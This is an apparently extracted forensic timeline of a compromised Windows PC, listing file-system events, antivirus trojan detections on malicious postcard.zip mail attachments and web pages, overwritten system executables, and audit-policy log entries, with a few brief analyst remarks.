12/14/07 14:40:45 accessed Ken.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Ken.mbx12/14/07 14:40:45 created Ken.mbx C:\My Documents\Qualcomm\Eudora\Ken.mbx12/14/07 14:40:46 accessed Misc.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Misc.mbx12/14/07 14:40:46 created Misc.mbx C:\My Documents\Qualcomm\Eudora\Misc.mbx12/14/07 14:40:47 accessed Out.mbx C:\Documents and Settings\smith.99999\My Documents\Qualcomm\Eudora\Out.mbx12/14/07 14:40:47 created Out.mbx C:\My Documents\Qualcomm\Eudora\Out.mbx12/14/07 14:48:48 created Mike.mbx C:\My Documents\Eudora\Mike.mbx12/14/07 14:48:49 created Misc.mbx C:\My Documents\Eudora\Misc.mbx12/14/07 14:48:51 created Out.mbx C:\My Documents\Eudora\Out.mbx12/14/07 14:49:01 created Previous search.mbx C:\My Documents\Eudora\Previous search.mbx12/14/07 14:49:02 created Scholarship.mbx C:\My Documents\Eudora\Scholarship.mbx
12/14/07 14:50:37 created 37679041.pdf.zip C:\\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive File, Archive12/18/07 9:41:00 created Baum's Page Wrestling.url http://www.baumspage.com/ Bookmarks -01/09/08 15:18:58 Deleted gnida[1].swf C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\CBPBUI7H\gnida[1].swfGeneric Downloader.bk (Trojan)C:\Program Files\Internet Explorer\iexplore.exe
01/22/08 16:53:30 accessed Mike.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Mike.mbx01/22/08 16:53:30 accessed Misc.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Misc.mbx01/22/08 16:53:30 accessed Out.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Out.mbx01/22/08 16:53:31 accessed Previous search.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Previous search.mbx01/22/08 16:53:32 accessed Scholarship.mbx C:\Documents and Settings\smith.99999\My Documents\Eudora\Scholarship.mbx
01/31/08 13:59:30 accessed 37679041.pdf.zip C:\\Documents and Settings\smith.99999\My Documents\Eudora\attach\37679041.pdf.zip ZIP Compressed Archive Match File, Archive02/08/08 11:08:46 Cleaned scholars1[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\B1COUTNU\scholars1[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\iexplore.exe02/13/08 11:46:41 Cleaned scholars1[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\67K7ML07\scholars1[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\iexplore.exe
02/19/08 10:38:46 we block the host for spamming02/22/08 10:58:38 created SbClientManager.exe C:\\Program Files\SafeBoot\SbClientManager.exe Windows Executable Code\Executable File, Archive02/22/08 11:00:00 created SafeBoot.scr C:\\WINDOWS\SafeBoot.scr Win NT Screen Saver Code\Executable File, Archive03/11/08 12:20:40 created uninstall.exe C:\\Program Files\Coupons\uninstall.exe Windows Executable Code\Executable Match File, Archive03/11/08 12:20:40 written uninstall.exe C:\\Program Files\Coupons\uninstall.exe Windows Executable Code\Executable Match File, Archive03/14/08 10:13:31 Cleaned scholars[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\A2EWQP6T\scholars[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\IEXPLORE.EXE03/14/08 10:14:21 Cleaned scholars1[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\K5Q3MFOP\scholars1[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\IEXPLORE.EXE03/17/08 10:58:56 Cleaned sal[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\L08JLPKH\sal[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\iexplore.exe03/25/08 12:22:15 accessed Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_CheckNow_S_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive03/25/08 12:22:16 accessed NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\NewShortcut2_F04825A0D1E9444AA8D32CE95CBF1716.exeWindows Executable Code\Executable Match File, Read Only, Archive03/25/08 12:22:16 accessed Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Help_SC1_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable File, Read Only, Archive03/25/08 12:22:17 accessed Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_FAQ_SC1_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive03/25/08 12:22:17 accessed Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exeC:\\WINDOWS\Installer\{7EFA5E6F-74F7-4AFB-8AEA-AA790BD3A76D}\Program_Setting_SC_A865F9643D344747AD8AA93191B65DD3.exeWindows Executable Code\Executable Match File, Read Only, Archive03/25/08 12:29:21 accessed SSLang.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\data\SSLang.exe Windows Executable Code\Executable File03/25/08 12:29:21 created SSLang.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\data\SSLang.exe Windows Executable Code\Executable File03/25/08 12:29:25 created Ssopen.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\data\Ssopen.exe Windows Executable Code\Executable Match File03/25/08 12:30:10 accessed Ssopen.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\data\Ssopen.exe Windows Executable Code\Executable Match File03/25/08 12:30:53 created setup.exe C:\\Program Files\Samsung\Samsung ML-2570 Series\Install\setup.exe Windows Executable Code\Executable File03/25/08 12:34:38 created SSMMgr.exe C:\\WINDOWS\Samsung\PanelMgr\SSMMgr.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:11 written accwiz.exe C:\\WINDOWS\SYSTEM32\accwiz.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:14 written cmd.exe C:\\WINDOWS\SYSTEM32\cmd.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:15 written conf.exe C:\\Program Files\NetMeeting\conf.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:16 written ctfmon.exe C:\\WINDOWS\SYSTEM32\ctfmon.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:16 written defrag.exe C:\\WINDOWS\SYSTEM32\defrag.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:16 written dfrgntfs.exe C:\\WINDOWS\SYSTEM32\dfrgntfs.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:18 written dumprep.exe C:\\WINDOWS\SYSTEM32\dumprep.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:18 written dwwin.exe C:\\WINDOWS\SYSTEM32\dwwin.exe Windows Executable Code\Executable Match File, Archive04/13/08 20:12:19 written explorer.exe C:\\WINDOWS\explorer.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:21 written fxscover.exe C:\\WINDOWS\SYSTEM32\fxscover.exe Windows Executable Code\Executable Match File, Archive04/13/08 20:12:21 written fxssvc.exe C:\\WINDOWS\SYSTEM32\fxssvc.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:21 written helpsvc.exe C:\\WINDOWS\PCHEALTH\HELPCTR\BINARIES\helpsvc.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:22 written imapi.exe C:\\WINDOWS\SYSTEM32\imapi.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:22 written ipconfig.exe C:\\WINDOWS\SYSTEM32\ipconfig.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:23 written mstsc.exe C:\\WINDOWS\SYSTEM32\mstsc.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:28 written msimn.exe C:\\Program Files\Outlook Express\msimn.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:28 written msmsgs.exe C:\\Program Files\Messenger\msmsgs.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:29 written netsh.exe C:\\WINDOWS\SYSTEM32\netsh.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:30 written ntbackup.exe C:\\WINDOWS\SYSTEM32\ntbackup.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:30 written ntvdm.exe C:\\WINDOWS\SYSTEM32\ntvdm.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:32 written regedit.exe C:\\WINDOWS\regedit.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:33 written rundll32.exe C:\\WINDOWS\SYSTEM32\rundll32.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:37 written taskkill.exe C:\\WINDOWS\SYSTEM32\taskkill.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:37 written tasklist.exe C:\\WINDOWS\SYSTEM32\tasklist.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:37 written taskmgr.exe C:\\WINDOWS\SYSTEM32\taskmgr.exe Windows Executable Code\Executable Match File, Archive04/13/08 20:12:38 written userinit.exe C:\\WINDOWS\SYSTEM32\userinit.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:38 written verclsid.exe C:\\WINDOWS\SYSTEM32\verclsid.exe Windows Executable Code\Executable File04/13/08 20:12:38 written wab.exe C:\\Program Files\Outlook Express\wab.exe Windows Executable Code\Executable File, Archive04/13/08 20:12:40 written wordpad.exe C:\\Program Files\Windows NT\Accessories\wordpad.exe Windows Executable Code\Executable File, Archive04/14/08 8:56:50 Cleaned scholars[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\NSVT4NCB\scholars[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\IEXPLORE.EXE04/14/08 8:57:14 Cleaned dates[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\C9712A8M\dates[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\IEXPLORE.EXE04/14/08 8:57:44 Cleaned ohio[1].htm C:\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\G0CBQJRK\ohio[1].htmW32/RAHack!htm (Trojan)C:\Program Files\Internet Explorer\IEXPLORE.EXE07/07/08 16:07:39 accessed ubw042706ay07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ubw042706ay07.xls
07/07/08 16:07:39 accessed ogr-ubw042706ay07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ogr-ubw042706ay07.xls07/07/08 16:08:21 modified ubw042706ay07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ubw042706ay07.xls
07/07/08 16:08:21 modified ogr-ubw042706ay07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\2006 Scholarships\ogr-ubw042706ay07.xls07/07/08 16:11:00 accessed IFT 07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls
07/07/08 16:11:00 accessed IFT 07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls07/07/08 16:12:20 written Underwater Basket Weaving Majors and Minors 0708.xlsC:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\Underwater Basket Weaving Majors and Minors 0708.xls
07/07/08 16:12:20 written UBW Majors and Minors 0708.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\UBW Majors and Minors 0708.xls07/07/08 16:13:57 modified IFT 07.xls C:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls
07/07/08 16:13:57 modified IFT 07.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\IFT\IFT 07.xls07/08/08 22:13:26 created googleearth.exe C:\\Program Files\Google\Google Earth\googleearth.exe Windows Executable Code\Executable File, Archive07/08/08 22:13:26 written googleearth.exe C:\\Program Files\Google\Google Earth\googleearth.exe Windows Executable Code\Executable File, Archive07/22/08 13:09:41 modified Underwater Basket Weaving Majors and Minors 0708.xlsC:\\Documents and Settings\smith.99999\My Documents\UBW Scholarships\Underwater Basket Weaving Majors and Minors 0708.xls
07/22/08 13:09:41 modified UBW Majors and Minors 0708.xls C:\Documents and Settings\smith.99999\My Documents\UBW Scholarships\UBW Majors and Minors 0708.xls07/28/08 10:14:22 modified Mike.mbx C:\Program Files\Qualcomm\Eudora\Mike.mbx07/28/08 10:14:22 written Mike.mbx C:\Program Files\Qualcomm\Eudora\Mike.mbx
08/04/08 13:40:51 accessed REC719271.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\REC719271.zip ZIP Compressed Archive Match File, Recycled, Archive08/04/08 13:40:51 created REC719271.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\REC719271.zip ZIP Compressed Archive Match File, Recycled, Archive08/04/08 13:40:51 written REC719271.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\REC719271.zip ZIP Compressed Archive Match File, Recycled, Archive08/15/08 16:22:54 deleted REC719271.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\REC719271.zip ZIP Compressed Archive Match File, Recycled, Archive08/15/08 16:22:54 modified REC719271.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\REC719271.zip ZIP Compressed Archive Match File, Recycled, Archive08/25/08 6:27:59 logged SecEvent.Evt
08/25/08 8:06:28 logged SecEvent.Evt
09/10/08 6:29:15 logged SecEvent.Evt
EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; - - Account Logon;Changed By:; User Name: HACKEDPC$; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x3E7)EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; + + Account Logon;Changed By:; User Name: HACKEDPC$; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x3E7)EVENT ID: 612 EVENT TYPE: SUCCESS_AUDIT EVENT CATEGORY: Policy Change SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: Audit Policy Change:;New Policy:; Success Failure; - - Logon/Logoff; - - Object Access; - - Privilege Use; - - Account Management; - - Policy Change; - - System; - - Detailed Tracking; - - Directory Service Access; - - Account Logon;Changed By:; User Name: HACKEDPC$; Domain Name: UNDERWATERBASKETWEAVING; Logon ID: (0x0,0x3E7)
![Page 4: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/4.jpg)
09/10/08 8:03:48 logged SecEvent.Evt
09/16/08 6:52:20 logged SecEvent.Evt
09/16/08 6:52:20 logged SecEvent.Evt
09/16/08 7:17:51 logged SecEvent.Evt
09/16/08 7:17:52 logged SecEvent.Evt
09/16/08 7:59:46 accessed msimn.exe C:\\Program Files\Outlook Express\msimn.exe Windows Executable Code\Executable File, Archive09/16/08 8:22:37 created WUAUCLT.EXE-1360D60A.pf C:\WINDOWS\Prefetch\WUAUCLT.EXE-1360D60A.pf09/16/08 8:24:40 created WMIPRVSE.EXE-0D449B4F.pf C:\WINDOWS\Prefetch\WMIPRVSE.EXE-0D449B4F.pf09/16/08 11:41:17 created USERINIT.EXE-0743FDA9.pf C:\WINDOWS\Prefetch\USERINIT.EXE-0743FDA9.pf09/16/08 11:42:15 created SCHEDHLP.EXE-29F59EF1.pf C:\WINDOWS\Prefetch\SCHEDHLP.EXE-29F59EF1.pf09/16/08 11:42:16 created SSMMGR.EXE-064D047E.pf C:\WINDOWS\Prefetch\SSMMGR.EXE-064D047E.pf09/16/08 11:42:23 created TRANSFERAGENT.EXE-19919614.pfC:\WINDOWS\Prefetch\TRANSFERAGENT.EXE-19919614.pf09/22/08 11:07:19 accessed tits.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits.rar Compressed Archive Archive Match File, Recycled, Archive09/22/08 11:07:19 created tits.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits.rar Compressed Archive Archive Match File, Recycled, Archive09/22/08 11:07:19 written tits.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits.rar Compressed Archive Archive Match File, Recycled, Archive09/23/08 8:14:23 accessed tits1.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits1.rar Compressed Archive Archive Match File, Recycled, Archive09/23/08 8:14:23 created tits1.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits1.rar Compressed Archive Archive Match File, Recycled, Archive09/23/08 8:14:23 written tits1.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits1.rar Compressed Archive Archive Match File, Recycled, Archive09/23/08 16:49:52 deleted tits1.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits1.rar Compressed Archive Archive Match File, Recycled, Archive09/23/08 16:49:52 modified tits1.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits1.rar Compressed Archive Archive Match File, Recycled, Archive10/02/08 17:28:00 deleted tits.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits.rar Compressed Archive Archive Match File, Recycled, Archive10/02/08 17:28:00 modified tits.rar C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\tits.rar Compressed Archive Archive Match File, Recycled, Archive10/06/08 9:15:22 accessed pussy.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\pussy.zip ZIP Compressed Archive Match File, Recycled, Archive10/06/08 9:15:22 created pussy.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\pussy.zip ZIP Compressed Archive Match File, Recycled, Archive10/06/08 9:15:22 written pussy.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\pussy.zip ZIP Compressed Archive Match File, Recycled, Archive10/06/08 17:04:10 deleted pussy.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\pussy.zip ZIP Compressed Archive Match File, Recycled, Archive10/06/08 17:04:10 modified pussy.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\pussy.zip ZIP Compressed Archive Match File, Recycled, Archive10/17/08 7:56:29 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive10/17/08 7:56:29 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive10/17/08 7:56:29 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive
10/17/08 7:56:29 its interesting to see how many postcard.zip files were created vs. what mcafee detected10/17/08 7:56:29 Deleted postcard.zip C:\program files\qualcomm\eudora\attach\postcard.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe10/20/08 11:16:34 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive10/20/08 11:16:34 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive10/20/08 11:16:34 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive10/21/08 7:32:35 accessed postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive10/21/08 7:32:35 created postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive10/21/08 7:32:35 written postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive10/22/08 7:31:40 Deleted postcard3.zip C:\program files\qualcomm\eudora\attach\postcard3.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe10/23/08 9:01:13 accessed postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive10/23/08 9:01:13 created postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive10/23/08 9:01:13 written postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 7:32:37 accessed Rechnung.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Rechnung.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 7:32:37 accessed postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 7:32:37 created Rechnung.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Rechnung.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 7:32:37 created postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 7:32:37 written Rechnung.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Rechnung.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 7:32:37 written postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 7:32:38 accessed postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 7:32:38 created postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 7:32:38 written postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 14:17:52 accessed Anhang.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Anhang.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 14:17:52 created Anhang.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Anhang.zip ZIP Compressed Archive Match File, Recycled, Archive10/24/08 14:17:52 written Anhang.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Anhang.zip ZIP Compressed Archive Match File, Recycled, Archive10/27/08 17:00:55 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive10/27/08 17:00:55 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive10/28/08 11:07:05 accessed wab.exe C:\\Program Files\Outlook Express\wab.exe Windows Executable Code\Executable File, Archive10/31/08 7:38:51 Deleted postcard.zip C:\program files\qualcomm\eudora\attach\postcard.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/03/08 7:54:43 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 7:54:43 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 7:54:43 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:55:53 deleted Rechnung.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Rechnung.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:55:53 deleted postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:55:53 deleted postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:55:53 modified Rechnung.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Rechnung.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:55:53 modified postcard4.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard4.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:55:53 modified postcard5.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard5.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:55:55 deleted postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:55:55 modified postcard3.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard3.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:56:00 deleted postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:56:00 deleted postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:56:00 modified postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/03/08 16:56:00 modified postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive11/04/08 14:52:00 deleted Anhang.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Anhang.zip ZIP Compressed Archive Match File, Recycled, Archive11/04/08 14:52:00 modified Anhang.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\Anhang.zip ZIP Compressed Archive Match File, Recycled, Archive11/05/08 7:50:31 Deleted postcard1.zip C:\program files\qualcomm\eudora\attach\postcard1.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/06/08 7:28:54 accessed postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/06/08 7:28:54 created postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/06/08 7:28:54 written postcard1.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard1.zip ZIP Compressed Archive Match File, Recycled, Archive11/10/08 7:38:20 created postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive11/10/08 7:38:20 Deleted postcard2.zip C:\program files\qualcomm\eudora\attach\postcard2.zip Generic Malware.a!zip (Trojan)C:\Program Files\Qualcomm\Eudora\Eudora.exe11/10/08 7:38:21 accessed postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive11/10/08 7:38:21 written postcard2.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard2.zip ZIP Compressed Archive Match File, Recycled, Archive11/10/08 16:23:04 deleted postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/10/08 16:23:04 modified postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/12/08 7:37:53 accessed postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/12/08 7:37:53 created postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/12/08 7:37:53 written postcard.zip C:\\RECYCLER\S-1-5-21-57765512-1263358170-1248344978-1385\postcard.zip ZIP Compressed Archive Match File, Recycled, Archive11/12/08 7:37:54 created postcard3.zip 